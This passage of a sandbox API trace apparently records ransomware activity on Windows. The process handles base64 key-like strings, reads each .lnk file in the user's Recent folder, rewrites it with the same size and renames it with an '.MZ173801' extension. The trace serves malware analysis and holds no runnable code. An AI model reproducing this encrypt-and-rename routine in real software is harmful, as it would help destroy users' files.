lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.175] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0109.176] GetCurrentThreadId () returned 0x1358 [0109.176] GetCurrentThreadId () returned 0x1358 [0109.176] GetCurrentThreadId () returned 0x1358 [0109.176] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.176] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0109.176] GetCurrentThreadId () returned 0x1358 [0109.176] GetCurrentThreadId () returned 0x1358 [0109.176] GetCurrentThreadId () returned 0x1358 [0109.176] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\H0Fbjn1UaDFSWci6YS.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\h0fbjn1uadfswci6ys.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.176] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0109.177] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.177] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x663 [0109.177] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.177] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x663, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x663, lpOverlapped=0x0) returned 1 [0109.177] CloseHandle (hObject=0x3f4) returned 1 [0109.178] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\H0Fbjn1UaDFSWci6YS.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\h0fbjn1uadfswci6ys.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.178] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x663, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x663, lpOverlapped=0x0) returned 1 [0109.179] CloseHandle (hObject=0x3f4) returned 1 [0109.180] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\H0Fbjn1UaDFSWci6YS.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\h0fbjn1uadfswci6ys.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\H0Fbjn1UaDFSWci6YS.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\h0fbjn1uadfswci6ys.lnk.mz173801")) returned 1 [0109.181] GetCurrentThreadId () returned 0x1358 [0109.181] GetCurrentThreadId () returned 0x1358 [0109.181] GetCurrentThreadId () returned 0x1358 [0109.181] GetCurrentThreadId () returned 0x1358 [0109.181] GetCurrentThreadId () returned 0x1358 [0109.181] GetCurrentThreadId () returned 0x1358 [0109.181] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea873e9a, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea873e9a, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea873e9a, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x277, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="H4CXj5T.lnk", cAlternateFileName="")) returned 1 [0109.181] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0109.181] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0109.181] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\H4CXj5T.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\h4cxj5t.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea873e9a, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea873e9a, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea873e9a, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x277)) returned 1 [0109.181] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.181] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0109.182] GetCurrentThreadId () returned 0x1358 [0109.182] GetCurrentThreadId () returned 0x1358 [0109.182] GetCurrentThreadId () returned 0x1358 [0109.182] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.182] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0109.182] GetCurrentThreadId () returned 0x1358 [0109.182] GetCurrentThreadId () returned 0x1358 [0109.182] GetCurrentThreadId () returned 0x1358 [0109.182] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\H4CXj5T.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\h4cxj5t.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.183] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0109.183] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.183] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x277 [0109.183] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.183] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x277, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x277, lpOverlapped=0x0) returned 1 [0109.183] CloseHandle (hObject=0x3f4) returned 1 [0109.184] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\H4CXj5T.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\h4cxj5t.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.184] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x277, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, 